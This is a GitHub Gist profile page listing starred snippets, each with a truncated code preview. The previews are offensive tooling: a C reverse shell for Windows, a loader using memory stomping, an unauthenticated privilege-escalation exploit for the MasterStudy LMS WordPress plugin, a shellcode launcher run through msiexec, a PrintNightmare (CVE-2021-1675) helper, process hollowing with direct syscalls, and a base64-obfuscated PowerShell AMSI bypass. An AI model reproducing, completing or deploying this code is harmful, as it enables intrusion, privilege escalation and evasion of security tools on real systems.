Skip to content

Instantly share code, notes, and snippets.

View 0x25bit's full-sized avatar
:shipit:
Wait, did I stream that out loud?

Aekr1_ //akrasia 0x25bit

:shipit:
Wait, did I stream that out loud?
396 followers · 822 following
View GitHub Profile
@dr4k0nia
dr4k0nia / HInvokeHashGen.cs
Created May 22, 2023 18:43
Tool to generate Hashes for HInvoke
using System;
using System.Collections;
using System.Collections.Generic;
using System.Linq;
using System.Linq.Expressions;
using System.Reflection;
using System.Text;
GetMethodHash("System.Reflection.Assembly", "Load");
@loneicewolf
loneicewolf / compact_windows_reverse_shell.c
Last active June 3, 2024 12:24
A compact windows reverse shell written in the C Programming Language.
/*
* code inspired and modified from defcon25,MSDocs,StackOverflow
* i686-w64-mingw32-gcc -o win_rsh win_rsh.c -lws2_32
*/
#include <ws2tcpip.h>
#include <stdio.h>
#pragma comment(lib, "ws2_32")
int main(int argc, char *argv[]){
WSADATA wsaData;
@Cracked5pider
Cracked5pider / LOADER_SNIPPET_STOMP.c
Created April 24, 2022 23:59
Lol
MapImg = MemAllocateStomped( &fTable, ImgLen );
if ( !MapImg ) {
sParam.ImgMod = TRUE;
MapImg = MemAllocateVirtual( &fTable, ImgLen );
};
InlineZeroMemory( MapImg, ImgLen );
SecHdr = IMAGE_FIRST_SECTION( NtsHdr );
for ( INT i = 0 ; i < NtsHdr->FileHeader.NumberOfSections ; ++i ) {
@numanturle
numanturle / Exploit.js
Created January 30, 2022 10:51
MasterStudy LMS – WordPress LMS Plugin 2.7.5 - Privilege Escalation (Unauthenticated)
function randomInt(min, max) {
return Math.floor(Math.random() * (max - min + 1)) + min;
}
jQuery(document).ready(function($){
username = "poctesting"+randomInt(1,1337);
password_poc = "S3cr3t"+randomInt(1,1337);
nonce = stm_lms_nonces.stm_lms_register
post_data = {
@mgeeky
mgeeky / How to use a function pointer in VBA.md
Created October 22, 2021 09:16 — forked from sancarn/How to use a function pointer in VBA.md
How to use a function pointer in VBA by Akihito Yamashiro

VB6 and VBA come with no support for function pointers.

Also, when you wish to execute a function in a dll using the Declare function, you can only call functions created by the Steadcall calling conversation.

These constraints can be avoided by using the DispCallFunc API. The DispCallFunc is widely used in VB6 when erasing the history of IE. Although the DispCallFunc is known as API for calling the IUnknown interface, in fact, you can also perform other functions other than COM by passing the NULL to the first argument.

As explained in the http://msdn.microsoft.com/en-us/library/ms221473(v=vs.85).aspx , the DispCallFunc argument is as follows.

@mgeeky
mgeeky / wdfilter-tests.ps1
Last active November 19, 2021 23:12
WdFilter.ps1 tests - script accompanying my tweet: https://twitter.com/mariuszbit/status/1450479981855969281
#
# Script that somewhat shows that processes specifically named may download
# Mimikatz unobstructed.
#
# Tweet related:
# https://twitter.com/mariuszbit/status/1450479981855969281
#
$code = @'
class Program
@aniqfakhrul
aniqfakhrul / dlllauncher.cs
Created July 7, 2021 04:21
DLL Shellcode Launcher with MSBuild export
//execute with
//msiexec.exe /z C:\Users\ch4rm\Desktop\ObfuscatorXOR\Dlllauncher\bin\x64\Release\Dlllauncher.dll
using System;
using RGiesecke.DllExport;
using System.Runtime.InteropServices;
using System.Diagnostics;
using System.Text;
using System.Security.Cryptography;
using System.IO;
@hlldz
hlldz / cve_2021_1675_lpe_dll_finder.cpp
Last active January 26, 2022 12:39
DLL Path Finder for CVE-2021-1675 (LPE)
// It is returns DLL path, you can use that value in exploit.
// Example return value: C:\WINDOWS\System32\DriverStore\FileRepository\ntprint.inf_amd64_xxxxxxxxxxxxxxxx\Amd64\UNIDRV.DLL
wchar_t* findDLLPath() {
wchar_t targetDLLPath[MAX_PATH] = { 0 };
DWORD dwNeeded;
LPBYTE lpDriverInfo;
DWORD dwReturned;
@aniqfakhrul
aniqfakhrul / hollow_sc.cpp
Created June 24, 2021 08:24
Process Hollowing + Direct Syscalls
#include <iostream>
#include <Windows.h>
#include <TlHelp32.h>
#include <vector>
#include "aes.hpp"
#include "base64.h"
#include "low.h"
#include <string>
#include <map>
#include <sstream>
@aniqfakhrul
aniqfakhrul / reflective.ps1
Created May 28, 2021 09:09
Load .NET Code Reflectively + AMSI Scan Buffer Bypass
[SySTEM.TexT.EnCODING]::uNIcodE.getStriNG([sYsTEM.conVErt]::fROmBAsE64stRINg("IwBNAGEAdAB0ACAARwByAGEAZQBiAGUAcgBzACAAUgBlAGYAbABlAGMAdABpAG8AbgAgAG0AZQB0AGgAbwBkACAAdwBpAHQAaAAgAFcATQBGADUAIABhAHUAdABvAGwAbwBnAGcAaQBuAGcAIABiAHkAcABhAHMAcwAgAAoAWwBEAGUAbABlAGcAYQB0AGUAXQA6ADoAQwByAGUAYQB0AGUARABlAGwAZQBnAGEAdABlACgAKAAiAEYAdQBuAGMAYABgADMAWwBTAHQAcgBpAG4AZwAsACAAJAAoACgAWwBTAHQAcgBpAG4AZwBdAC4AQQBzAHMAZQBtAGIAbAB5AC4ARwBlAHQAVAB5AHAAZQAoACQAKAAnAFMAeQBzAHQAZQBtAC4AUgBlAGYAbABlAGMAdADtAPUAbgAuAEIA7QBuAGQA7QBuAGcARgBsAOMAZwBzACcALgBuAG8AUgBNAEEAbABpAFoAZQAoAFsAQwBIAGEAcgBdACgANwAwACoAMgA0AC8AMgA0ACkAKwBbAEMAaABBAHIAXQAoADEAMQAxACsAMQA2AC0AMQA2ACkAKwBbAGMASABBAHIAXQAoADEANAArADEAMAAwACkAKwBbAEMAaABhAHIAXQAoADcAKwAxADAAMgApACsAWwBjAEgAQQBSAF0AKAA2ADgAKgA0ADMALwA0ADMAKQApACAALQByAGUAcABsAGEAYwBlACAAWwBjAEgAYQBSAF0AKABbAEIAeQB0AEUAXQAwAHgANQBjACkAKwBbAEMAaABBAFIAXQAoAFsAQgB5AHQARQBdADAAeAA3ADAAKQArAFsAYwBoAGEAcgBdACgAWwBCAFkAVABFAF0AMAB4ADcAYgApACsAWwBDAEgAQQBSAF0AKAA3ADcAKgAyADkALwAyADkAKQArAFsAYwBIAGEAcgBdACgAMQ